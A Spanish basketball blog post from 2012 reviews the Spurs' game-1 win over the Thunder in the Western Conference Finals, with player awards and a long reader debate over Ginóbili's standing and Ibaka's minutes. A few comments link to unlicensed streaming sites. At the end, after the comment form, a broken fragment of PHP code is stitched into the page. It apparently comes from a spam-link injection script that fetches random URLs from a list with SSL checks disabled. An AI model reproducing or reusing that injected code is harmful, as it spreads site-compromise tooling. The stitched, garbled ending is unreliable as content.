La Crónica: Más sabe el diablo por viejo

28 de May de 2012 por TheDeerHunter

Ojo a los Spurs. Racha de 19 victorias consecutivas, empatando el récord histórico mediados los Playoffs. El cuarto equipo que comienza con 9-0 en todos los tiempos. Los otros tres son distintas generaciones de Lakers, que lograron el anillo en dos ocasiones (1982, 2001) y fueron subcampeones en la otra (1989)

La espada de la suficiencia tiene doble filo. Nos habíamos acostumbrado a la cara amable y sobrada de los Spurs. La versión ye-ye, el juego de pase estilo Kings de Adelman, Popovich una versión suavizada de Guardiola. Una leche.

Hace falta un cuarto de 16 puntos, los durísimos Thunder comprometiendo seriamente el resultado, para volver a ver la cara al verdadero viejo zorro. Una bronca a los suyos de esas que no conviene recibir. Frase lapidaria no lanzada por casualidad: “I need a little bit more dose of nasty”  o, en castizo, a ganar por lo civil o por lo criminal. A sacar la mala baba.

No vamos a decir que, de repente, los Spurs se transformaron en una versión criminal de los Bad Boys. Simplemente la cara de vinagre y el cabreo del técnico sacó a los suyos del estado de ensoñación y de la autocomplacencia. Fue el momento de la vieja guardia. Sin desmerecer, nada de Leonard, Green, Splitter, mucho menos Blair. Como en los viejos tiempos, volvimos a ver cabalgar juntos a Parker, Manudo, Jackson y Duncan, sin las piernas de hace casi una década. El resultado: una apisonadora como pocas hemos visto este curso. 39 puntos de chaparrón en el último cuarto. La rocosa defensa de los Thunder no sabía ni dónde meterse.

Ayer, exceptuando la anomalía Durant, fue un duelo de veteranos. No es casualidad que volviera a brillar Fisher en un escenario mágico como ese. Tampoco que lo pasaran mal Westbrook y Harden. Lección magistral a este último de Manudo -quien tuvo, retuvo-, en su mejor actuación del curso precisamente ahora. Definitivamente hay muy poco de casual en todo esto.

PREMIOS

MVP: Eficiente y decisivo. Manu Ginóbili parecía estar reservando su mejor versión para las grandes ocasiones, y anoche era una de ellas. Los Spurs necesitaron cada uno de sus 26 puntos (9/14 en tiros de campo y 5/5 en libres), 5 rebotes y 3 asistencias para apuntarse la victoria.

Rookie: No brilló Kawhi Leonard, pero sus 7 puntos y 7 rebotes son más de lo que aportaron varios de sus compañeros.

Sorpresa: ¿Sorpresa? En la primera gran cita de la temporada, un día en el que su equipo apenas alcanzó el 42% de acierto en tiros, Derek Fisher sacó galones y probó que las jerarquías no están porque sí. Anotó 6 de sus 8 tiros y fue el único Thunder, al margen del ‘Big Three’, en dobles figuras de anotación.

Decepción: Veníamos destacando el magnífico, impecable papel de Russell Westbrook durante los Playoffs, pero anoche cometió todos los pecados que le conocemos. Lanzó demasiado (21 tiros de campo para 17 puntos), distribuyó poco y perdió muchos balones (4, tantos como en toda la serie ante los Lakers).

Esfuerzo en vano: Aunque le hemos visto brillar con más intensidad, no podemos decir que Durant no lo intentase. 27 puntos, 10 rebotes, 4 asistencias, 3 tapones y 2 robos. Le faltó, sin embargo, rematarlo en el último cuarto, cuando solo pudo anotar 6 tiros libres.

Imágenes | AP Photos / Getty Images

Comenta

27 comentarios a esta entrada

  1. simon dice:
    #1

    Y todavia habia gente que dudaba si Manudona era top 10 de la ultima decada e incluso metian a Mcgrady, Carter o parecidos por encima de el…

      Citar

  2. nba dice:
    #2

    Yo sigo diciendo o Brooks rompe con el guion preestablecido, e involucra a mas gente suya en ataque o los Spurs van a acabar con la serie por la via rapida, que estos Spurs no son las “hermanitas” de la caridad que eran los Lakers

      Citar

  3. HisRoyalAirness dice:
    #3

    Ayer, haciendo caso omiso de mis responsabilidades académicas, me quedé a ver el partido; el motivo? En el primer cuarto vi el primer emparejamiento Manudona-Harden. El lenguaje corporal del argentino me dijo que iba a ser una gran noche.

    La cosa me dejò varias sensaciones. Pese a los nùmeros de Durant, Leonard y algün otro hicieron un gran trabajo con él,sobre todo empujando mucho para q tuviese q recibir fuera de la zona de 3 (aunque estoy impresionado con lo que ha mejorado KD en el bote) y no pudiese armar el tiro rápido.
    Duncan sigue jugando al tran-tran y le sobra y la basta. Defensa sobria e intimidaciòn en la pintura. No le pusieron en demasiados problemas.
    Parker empezó un poco renqueante y fue de menos a màs. Manu hizo pura magia, como en los viejos tiempos, incluído un triple en caIda espectacular que sirvió de buzzer-beater en el primer tiempo (ché, qué bueno que viniste!). Harden aún está buscando què le pasò por encima. Tuvo también Ginobili un conato de roce con Perkins, que intentó jugar la carta de montar tangana para descentrar al personal; mi consejo para él: JAMÅS provoques a un argentino durante un partido de lo que sea al máximo nivel, te vas a arrepentir.

    Lo bueno de tener el league pass es que se pueden escuchar la mayoría de charlas en los TO y me quedo con la frase de Pop que les dijo cuando los Thunder se pusieron 10 por delante; con una cara de mala leche espectacular pide tiempo, los reúne a todos, levanta la cabeza y dice: “ya nos hemos divertido suficiente??”. A partir de ahí no hubo partido

      Citar

  4. Nacho dice:
    #4

    Lo de Ginobili se resume en el canastón que mete a falta de dos minutos. Pura magia.

      Citar

  5. Viva_Dirk dice:
    #5

    simon:
    Y todavia habia gente que dudaba si Manudona era top 10 de la ultima decada e incluso metian a Mcgrady, Carter o parecidos por encima de el…

    No se a que discusión te refieres exactamente y quien habria puesto a esos 2 en una lista de los mejores de la década, pero siento decepcionarte al decirte que no esta en un top10 de la última década, a pesar de lo de ayer y de ser un jugadorazo como hay poquísimos.

      Citar

  6. nba dice:
    #6

    Lo que es evidente de esta serie es que tanto Ginobili como Harden, son jugadores especiales, lo unico que al barbudo aun le queda tomarse unos cuantos “colacaos” para llegar a una cuarta parte de lo que es y ha sido Ginobili.

      Citar

  7. Esteban dice:
    #7

    mas alla del partidazo de manu, es algo raro verlo, por q a veces hay suplentes que saltan y se van como goleadores de sus equipo, recuerdo a james jones el año pasado en herat vs bostgon, anotando 7 triples si no me acuerdo

    a veces pasa eso, un suplente enrachado se para en el rincon, dan vuelta la bola, hasta que le cae y chazzzzzzzz

    pero lo de ginobili fue diferente, jugando se base y de escolta, tomando desiciones dificiles, penetrando y tirando de tres, jugnado pickandroll y dando asistencias en cortada

    ayer jugo como el jugador franquicia del equipo, y creo que mostro una superioridad intelectual sobre el thunder, cuando penetrar, cuando dar el pase abajo, cuando aprovechar los desmarques

    y brooks subestimandolo demasiado, mandaba a q le marquen la zurda y le den la derecha, una falta de respeto para manu, que la hizo pagar con 3 penetraciones, un doblre, un foul y vale y una asistencia, no tendra buena derecha, pero tiene unos movimientos que disifrazan cualquier deficiencia

      Citar

  8. simon dice:
    #8

    Viva_Dirk: No se a que discusión te refieres exactamente y quien habria puesto a esos 2 en una lista de los mejores de la década, pero siento decepcionarte al decirte que no esta en un top10 de la última década, a pesar de lo de ayer y de ser un jugadorazo como hay poquísimos.

    un top 10 es exagerar vale pero un top 15 segurisimo. Pues no se como surgió esta discusion pero habia gente ( no recuerdo quien exactamente quien defendia que gente como Carter o Mcgrady estaban por encima de Manudona.
    te pones a contar y por encima claramente te salen 10 o 11 solo.
    Duncan, Bryant,Oneal,Iverson,Billups, Nash , Kidd Garnett Nowitzki ,Pierce, Allen, Wade… lo dicho top 15

      Citar

  9. Ru dice:
    #9

    Esteban,Manu siempre fue jugador que saliendo desde el banquillo ha hecho estragos,no es un jugador de que en una racha ocasional puede romper el partido como puede ser el caso que mencionas de James Jones en Miami.Esta temporada ha estado un poco por debajo,por el increible rendimiento de Parker y por los destellos de Duncan pero lo de esta pasada noche ha sido las exhibiciones que daba Ginóbili hace unas temporadas.Una exquisitez.

    Y quien ponía a Carter y McGrady por encima del argentino era melo,pero creo que prefería a esos dos por sus números y aquí decíamos que no era todo números.Probablemente por edad no pudo ver al mejor Ginóbili pero partidos como el de anoche le pueden dar una visión de lo que era y aún puede dar,a él y a todos nosotros,porque cosas así tenemos que disfrutarlas todos.

    Me está saliendo larga la respuesta porque está todo perfectamente explicado en el post.Westbrook con los fantasmas del pasado en el peor momento,ciertas entradas a canasta muy precipitadas y creo que no ha usado ese tirito de 4-5 metros bastante efectivo en él.Y algo que me deja con la idea de que Brooks se equivocó al dejar a Perkins en pista,ya ni decir cuando estuvo ocn 5 faltas,y no jugar con Ibaka.

      Citar

  10. futurman dice:
    #10

    ¿Por qué juega siempre tan poco Ibaka? nunca veo que pase de 30 minutos…

      Citar

  11. nba dice:
    #11

    Yo creo que respecto a Ibaka, me da a mi que lo esta haciendo para que este no se suba a la parra con su renovacion, porque sino no tiene sentido, Brooks sabra lo que hace pero si sigue asi le van a endosar un 4-0.

      Citar

  12. HisRoyalAirness dice:
    #12

    A ver, yo no entiendo por qué os empeñáis tanto en Ibaka. Ayer Collison jugó unos minutos muy buenos y defendiendo al hombre en el poste es mil veces mejor. A Serge le estaban comiendo la tostada y lo quitó porque no quería que los Spurs se metiesen antes de tiempo en bonus y, con la aficción de éste a cazar mariposas por los aires iba a caer. Es un jugador de rol, no es más; muy buen rol y ya. Además de ser un crío. Ayer les pasaron por encima y punto y un chaval de 22 años que lo único que sabe hacer ofensivamente es coger alley-ops y tirar desde 5 metros no va a solucionarte la papeleta. Veo más relevante el partido de Westbrook o el mismo Harden

      Citar

  13. simon dice:
    #13

    HisRoyalAirness:
    A ver, yo no entiendo por qué os empeñáis tanto en Ibaka. Ayer Collison jugó unos minutos muy buenos y defendiendo al hombre en el poste es mil veces mejor. A Serge le estaban comiendo la tostada y lo quitó porque no quería que los Spurs se metiesen antes de tiempo en bonus y, con la aficción de éste a cazar mariposas por los aires iba a caer. Es un jugador de rol, no es más; muy buen rol y ya. Además de ser un crío. Ayer les pasaron por encima y punto y un chaval de 22 años que lo único que sabe hacer ofensivamente es coger alley-ops y tirar desde 5 metros no va a solucionarte la papeleta. Veo más relevante el partido de Westbrook o el mismo Harden

    Hombre, pero mas de 20 minutitos si podría jugar… lo de las faltas no es un motivo pues Ibaka ayer mismo no hizo ni una falta y normalmente suele a cabar con 2 o 3 solamente.

      Citar

  14. Ru dice:
    #14

    Si me centro sólo en el final del partido,con un Perkins con 5 faltas y condicionado por no hacer la 6ª creo que Ibaka podía haber tenido esos minutos.Además Perkins estaba siendo superado por su par,no es que fuera el bastión contra Duncan precisamente.

      Citar

  15. Sancho88 dice:
    #15

    Dirk, ya estás troleando? nunca paras colega… Cómo no va a ser un top10 de la pasada década? Venga, te invito a que hagas la lista y no le pongas

      Citar

  16. Sancho88 dice:
    #16

    Por cierto, puto último cuarto de rojadirecta… estaba el enlace roto y me he perdido todo lo mejor… cawen la leche. Solo varios apuntes porque creo que ya está todo dicho: Fisher al mejor nivel que le recuerdo en muchísimos años y Manu haciendo basket de hace muchos años también. Eso solo lo hace él en la NBA, ese juego tan sencillo, esos pases de buscar al pívot en la continuación como Prigioni&Scola en el Tau… ufff. casi me corro viéndolo. Luego, hizo de todo, sus tiros en parada, sus canastas imposibles, en fin, sus momentos MANUDONA!! El Álamo se caía literalmente. Siempre he tenido la sensación que una canasta da Manu vale mucho más que las de el resto, quiero decir, como si en el aspecto motivacional del equipo influyese la leche, como si el rival al ver clavarla a Manu desaparece… un jugador irrepetible, histórico. Hall of famer seguro, aunque a alguno os pese

      Citar

  17. Lucho dice:
    #17

    Sancho, proba verlo en deportesonline.com, es muy buena tmb

    Vos decis que Manu llegara a ser Hall of Famer?? Ojala, es muy merecido

      Citar

  18. Esteban dice:
    #18

    ibaka juega poco por q juega mal, o regular siendo generoso
    ayer tuvo problemas de faltas y se comio todos los amegues de duncan (robinson vs hakeem), ademas de ser muy improductivo en ataque y reboteando, solo par de super tapas que hacen levantarte de la silla poco mas

    no es tanto por malo la improductividad ofensiva, sino mas que nada por q no mira el aro, y por el tipo de juego del thunder, no hay jugadas para involucrarlo ofensivamente, nisiquiera lobs al estilo denadre jordan

    el thunder necesitaba esta temporada un 4 o 5, q pudiera anotar, no importa si era mal defensor, lento o mal compañero, necesitan con urgencia un tio que al menos tenga tiro confiable desde afuera para abrir una via de gol mas, un novak o bonner si se quiere capaz que lanzar de 3, pero ni eso tienen, tienen 4 troncos q solo pueden defender en el juego interior y meter cortinas en ataque

    gracias a dios que durant, russel y harden son demasiado buenos como para cargar ellos 3 con toda una ofensiva, sino no van a ningun lado

      Citar

  19. melo15 dice:
    #19

    Pues, no me arrepiento de decir que Mcgrady ha sido igual o mejor que Manu, con Carter me pase pero con McGrady no, ha tenido mucha mas mala suerte que Ginobili, por ejemplo, sale de Toronto, se va a los Magic y se les lesiona Hill, en mi opinion podrian haber hecho grandes cosas los dos juntos, y cuando llega a Houston donde tenia opciones de hacer algo grande junto a Yao, se lesiona el. Quizas defensivamente ha sido peor, pero Ofensivamenete ha sido Top-10 de este decada con la gorra.
    Top-10 decada: Kobe, Duncan, O’neal, Garnett, Nash, Nowitki, Iverson, Kidd, Pierce, Lebron, Billups y al mismo nivel que Ray Allen, Pau y Wade.

      Citar

  20. nba dice:
    #20

    Si tienes a un magnifico taponador y no lo usas, cuando te enfrentas a un equipo que tiene autenticos maestros en entrar hasta la cocina y anotar como Parker y Ginobili, pues ya me diras cuando lo vas a usar .
    Que a Ibaka le falta mucho por aprender, por supuesto , pero eso no quita que para esos ultimos minutos del aluvion Spurs tendría que haber estado en pista

      Citar

  21. KB # 24 dice:
    #21

    Sancho88:
    Por cierto, puto último cuarto de rojadirecta… estaba el enlace roto y me he perdido todo lo mejor… cawen la leche. Solo varios apuntes porque creo que ya está todo dicho: Fisher al mejor nivel que le recuerdo en muchísimos años y Manu haciendo basket de hace muchos años también. Eso solo lo hace él en la NBA, ese juego tan sencillo, esos pases de buscar al pívot en la continuación como Prigioni&Scola en el Tau… ufff. casi me corro viéndolo. Luego, hizo de todo, sus tiros en parada, sus canastas imposibles, en fin, sus momentos MANUDONA!! El Álamo se caía literalmente. Siempre he tenido la sensación que una canasta da Manu vale mucho más que las de el resto, quiero decir, como si en el aspecto motivacional del equipo influyese la leche, como si el rival al ver clavarla a Manu desaparece… un jugador irrepetible, histórico. Hall of famer seguro, aunque a alguno os pese

    http://myp2p.pe/
    nunca falla!

      Citar

  22. futurman dice:
    #22

    Ibaka ayer no tenía problemas de faltas y no es tan malo anotando. Es más, es el mejor interno en ataque de Thunder (algo triste). Que no le preparen jugadas y que tengan poca confianza en el es otro tema.

    Manudo es buenísimo, pero top 10 jugadores de la década…es excederse por mucho. Eso si, como 6º hombre y como escolta…

      Citar

  23. Joaq dice:
    #23

    Con respecto a Manu, depende de que tipo de TOP 10. Si tomamos más anotadore/taponadores/asistencias/robos/saltos etc etc, seguro que no es top 10 ni de cerca. Pero lo cierto, con la presencia de Duncan y Parker y, en su momento, Robinson, este tipo gano 3 anillos! El deseo de competencia y jugar en un liga que, aunque cada vez mas cosmopolita, es bastante “yanqui”, haberse ganado el respeto y admiracion es un excelente logro. TOP 10 o not TOP 10, es un serie mundial. Hall of Fame, for sure!

      Citar

  24. Ru dice:
    #24

    Para mí Ibaka es un más que digno jugador,excelente a nivel defensivo con algunas taras todavía pero vamos,segundo hombre en la lista de Jugador defensivo del año,y ofensivamente estancado pero con previsiones de que puede desarrollar un solvente tiro a media distancia que es lo que se le achaca esta temporada y con razón.Esa es mi opinión sobre él de la misma forma que otros podéis tener otras valoraciones pero lo de que ayer no jugó más por faltas…¡¡¡0 faltas personales!!!Yo ahora mismo que estoy escribiendo en el blog tengo las mismas personales que él por dios…jajajaj.

    Quien tenía problemas de faltas era Perkins,5,y ahí estuvo jugando.Para jugar sin meter la mano en los minutos finales -y yo hubiera puesto a Ibaka antes sin que KP estuviera a 1 falta de ser eliminado- mete al congoleño.

      Citar

  25. Sancho88 dice:
    #25

    Ahí lo puse yo en las claves, que no se cargaran mucho de faltas… Perkins estuvo fatal anoche, qué faltas más ridículas… A Ibaka lo buscaron poco, pero pueden sacar mucho más rendimiento de él

      Citar

  26. simon dice:
    #26

    Y dale, yo creo que aqui por mucho repetir que Ibaka tiene problemas de faltas al final nos lo vamos a acabar creyendo, Ibaka ayer cometió 0 faltaas!!! y es un jugador que muy muy raramente se mete en problemas de faltas que su media de faltas es de solo 2.7 por partido, para un interno de sus caracteristicas eso no es nada…Nadie esta diciendo que Ibaka sea un AP de elite, es un buen interno que a nada que le prepararan dos o tres jugadas para el en ataque podria ser un 14-9 y sus 3 o 4 tapones facil. Tira bien de 5 metros, es una bestia fisica, y es un aceptable tirador de tiros libres ( va muy poco a la linea y la regularidad ahi se nota tambien ) no es una estrella ( ni lo va a ser ) pero es el mejor interno con diferencia de los Thunder, tiene muchisimo que mejorar pero de ahi a decir antes ( lo siento pero no voy a decir el nombre pq tampoco quiero personalizarlo en ese comentario mi respuesta ) que jugaba poco pq jugaba mal o es mal jugador…
    Por cierto decirme solo un interno al que Duncan no le haga un traje ( aun siendo un dinosaurio como es )

      Citar

  27. GreenPride dice:
    #27

    Pues lección de saber estar y veteranía de los Spurs a los Thunder en este primer partido… y eso que los Thunder parecían muy bien encaminados hasta empezar el último cuarto. Hasta ese momento habían controlado el ataque de los Spurs realmente muy bien y su defensa estaba consiguiendo minimizar el juego de los del Alamo en el que sólo Manudona parecía tener las cosas claras. Parker sin poder apenas correr, Duncan sin tener su día y en general el ataque Spur bastante controlado. No estoy para nada de acuerdo en que Duncan les hiciese un traje, sí les metió un par de buenas canastas pero su 6/15 en tiros de campo dice que no estuvo fenomenal ni mucho menos. El partido se les fué a los Thunder en el último cuarto porque no supieron parar el ataque de los Spurs dirigido por Manudo y porque en ataque empezaron a no tener las ideas claras y a lanzar tiros precipitados.
    La defensa spur apretó de lo lindo ahí con los veteranos haciendo de las suyas (grandes defensas de Stephen Jackson sobre Durantula) y eso hizo precipitarse a Westbrook consiguiendo lo que hablábamos en la previa que penetrase a lo loco y perdiese balones. Además impulsados por esa buena defensa los spurs empezaron a mover el balón y dirigidos por un fenomenal Manudo empezaron a acertar todos (fenomenales Neal y Slitter aprovechando sus tiros)
    Sin embargo, creo que hay motivos de esperanza para OKC. Durant pudo claramente con Leonard durante 3 cuartos y sólo la defensa de Jackson le hizo algo de sombra y durante buena parte del partido controlaron muy bien el ataque de los Spurs. Es claro que deben ser más duros y un último cuarto de 39 puntos de los Spurs no pueden volver a permitirlo pero yo sigo creyendo que la serie será larga. No creo que Manudo pueda imponerse tan claramente a Harden durante el resto de la serie y si siguen controlando bien a Duncan y Parker tendrán sus opciones. Su principal problema, que si falla alguno de su Big Three no tiene demasiadas opciones en ataque, al contrario de los Spurs donde todos aportan y muchos pueden meter entre 10 y 20 puntos cualquier noche. Por cierto, partidazo de Fisher, el que mejor entendió el partido por los Thunder.
    Como última cosa, grande el tiempo de Pop: “¿Os habéis divertido bastante? ¿Os pensábais que esto iba a a ser fácil? Cada ronda es más difícil y necesito que seáis duros y confiéis en vuestros tiros.” Crack!!!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>